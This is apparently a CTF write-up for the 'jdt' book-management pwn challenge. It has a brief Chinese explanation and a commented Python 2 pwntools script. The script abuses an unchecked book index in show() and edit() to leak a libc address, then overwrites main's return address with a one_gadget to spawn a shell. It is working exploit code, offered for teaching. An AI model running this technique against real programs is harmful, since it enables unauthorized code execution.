jdt
一个图书管理系统，但并不是常规的堆题。edit 和 show 函数可以越界。edit 函数和 show 函数相互配合泄露 libc 基地址，将 main 函数的返回地址覆盖成 one_gadget 拿 shell。
# Write-up exploit script for the "jdt" book-management challenge.
# Root cause (per the write-up above): show() and edit() take a book index
# with no bounds check, so index 16 reaches memory outside the book array.
# The same out-of-bounds read/write is used twice: first to read a stack
# slot (leak), then to overwrite it. A bounds check on idx in show/edit
# would close both the leak and the write.
#
# NOTE(review): Python 2 script — `print` statements and str-based
# ljust(8, '\x00') padding; it will not run unchanged under Python 3.
from pwn import *
p = process('./pwn')
elf = ELF('./pwn')
libc = ELF('./libc.so.6')
context(os='linux',arch='amd64',log_level='debug')
# Debug helper: attach gdb and pause. Defined but never called below.
def duan():
    gdb.attach(p)
    pause()
# Menu option 1: create a book. Defined but never called in this script;
# the attack does not need a real book, only the out-of-bounds index.
def add(price,author,name,description):
    p.sendlineafter('Choice: ','1')
    p.sendafter('Price?',str(price))
    p.sendafter('Author?',author)
    p.sendafter('name?',name)
    p.sendafter('Description?',description)
# Menu option 3: print the book at `index`. No client-side bound — the
# server-side missing check is what makes index 16 usable.
def show(index):
    p.sendlineafter('Choice: ','3')
    p.sendlineafter('idx?',str(index))
# Leak 1: the "Author" field at the out-of-bounds index prints 6 bytes of
# whatever sits in that slot. `addr` is saved only so it can be written back
# unchanged later (see the final edit), keeping that slot intact.
show(16)
p.recvuntil('Author: ')
addr = u64(p.recv(6).ljust(8,'\x00'))
print 'addr-->'+hex(addr)
# Edit (option 2) the out-of-bounds entry. The second '2' after the idx
# prompt is presumably the edit sub-menu's field selector, since the
# 'Author?' prompt follows it — not confirmable from this script alone.
# Writing exactly 8 'a's fills the first qword so the *next* qword is
# printed right after the marker on the following show().
p.sendlineafter('Choice: ','2')
p.sendlineafter('idx?','16')
p.sendlineafter('Choice: ','2')
p.sendafter('Author?','a'*8)
# Leak 2: the 6 bytes after the 'a' marker are a libc pointer. The write-up
# identifies it as main's return address into __libc_start_main; the 240
# offset is specific to the libc shipped with the challenge (./libc.so.6).
show(16)
p.recvuntil('aaaaaaaa')
libc_base = u64(p.recv(6).ljust(8,'\x00'))-240-libc.symbols['__libc_start_main']
print 'libc_base-->'+hex(libc_base)
# one_gadget offsets for that same libc; only og[0] is used.
og = [0x45226,0x4527a,0xf0364,0xf1207]
shell = libc_base+og[0]
# Final edit at the same index: restore the first qword (`addr`) and replace
# the second qword — the leaked return address slot — with the gadget.
p.sendlineafter('Choice: ','2')
p.sendlineafter('idx?','16')
p.sendlineafter('Choice: ','2')
p.sendafter('Author?',p64(addr)+p64(shell))
# Option 5 is presumably "exit": main returns through the overwritten slot.
p.sendlineafter('Choice: ','5')
p.interactive()